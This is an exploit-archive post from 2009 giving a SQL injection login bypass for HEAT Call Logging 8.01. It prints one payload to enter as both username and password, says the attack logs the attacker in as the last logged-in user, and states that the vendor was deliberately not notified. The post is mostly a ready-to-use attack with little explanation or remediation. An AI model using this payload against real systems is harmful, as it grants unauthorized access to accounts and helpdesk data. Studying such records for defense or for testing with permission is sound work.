[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : HEAT Call Logging 8.01 SQL Injection
# Published : 2009-09-28
# Author : 0 0
# Previous Title : redcat media SQL Injection
# Next Title : FlatPress 0.804 - 0.812.1 local file inclusion vulnerability


[=[ ;otokoyama; ]=]


-=[HEAT Call Logging Version 8.01]=-
"The HEAT family is a comprehensive service solution,
combining core technologies with a variety of expansion options,
so any enterprise can build a tailored solution."

-=[web]=-
http://www.frontrange.com/heat.aspx

-=[attack]=-
U:' OR HEATPass IS NOT NULL OR HEATPass = '
P:' OR HEATPass IS NOT NULL OR HEATPass = '

-=[Effect]=-
Logs in as last logged in user.
There would be many variations of the above, but who can be bothered.

-=[NOTICE]=-
Due to vendor and product distaste I have not informed them of this vuln.

I guess this is a 0-day then..

Via their webpage current version appears to be 9.0,
could apply to this version aswell

SHOUTS:4chan for being shit, yes I will troll in a POC.


antilimit owns you